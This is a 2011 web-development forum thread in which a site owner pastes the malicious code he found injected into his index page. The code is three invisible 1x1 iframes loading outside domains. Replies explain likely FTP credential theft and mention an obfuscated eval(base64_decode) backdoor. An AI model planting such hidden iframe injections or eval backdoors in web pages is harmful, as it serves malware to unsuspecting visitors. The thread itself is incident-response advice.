Orionsbelter Posted January 26, 2011 Share Posted January 26, 2011 Just got an email from google saying that my site has malware on it. I looked into this and found that someone has put coding in my index code here is the code: <iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe><iframe src="http://adsensestat.com/" width="1" height="1" frameborder="0"></iframe><iframe src='http://visions7.net/' width=1 height=1 style='visibility:hidden;'></iframe> I am a newbie at web development and would appreciate if someone could tell me how this happened and how to avoid it happening in the future. I use a freehostia paid hosting account, so not sure if there is something happening on thier sever :S. Thank for reading. Quote Link to comment https://forums.phpfreaks.com/topic/225687-injected-code/ Share on other sites More sharing options...
PFMaBiSmAd Posted January 26, 2011 Share Posted January 26, 2011 If the change was actually made to the source code in the file, then someone had sufficient access to the server to be able to read, change, and write the file. You should get and check the server log files to find out all the information you can about who, what, when, and from where your file got written to. You should also download a copy of all your files, taking card to NOT overwrite any existing backup copy of your files, and then use comparison tool, like WinMerge - http://winmerge.org/ to find all the differences between your last backup copy and the current files, including any new files that are not part of your web page. Quote Link to comment https://forums.phpfreaks.com/topic/225687-injected-code/#findComment-1165303 Share on other sites More sharing options...
tibberous Posted January 26, 2011 Share Posted January 26, 2011 Happened to us - our designer got a virus that stole his FTP login. Whats weird is that it didn't show up right away. I think they steal the ftp passwords, the attack later on. Look through your files. You probably have something like thumbnail.php that's just an eval(base64_decode("gf46uy45h6n67n6rmrnw45h... or something similar. Quote Link to comment https://forums.phpfreaks.com/topic/225687-injected-code/#findComment-1165335 Share on other sites More sharing options...
KevinM1 Posted January 26, 2011 Share Posted January 26, 2011 Happened to us - our designer got a virus that stole his FTP login. Whats weird is that it didn't show up right away. I think they steal the ftp passwords, the attack later on. Not so weird. Think about it - there's more than one of these viruses in the wild, right? Depending on how they do their job (simple keylogger? something more sophisticated?), they're all going to be sending back a not insignificant amount of data. Sifting through and testing the accumulated data takes time. Quote Link to comment https://forums.phpfreaks.com/topic/225687-injected-code/#findComment-1165409 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.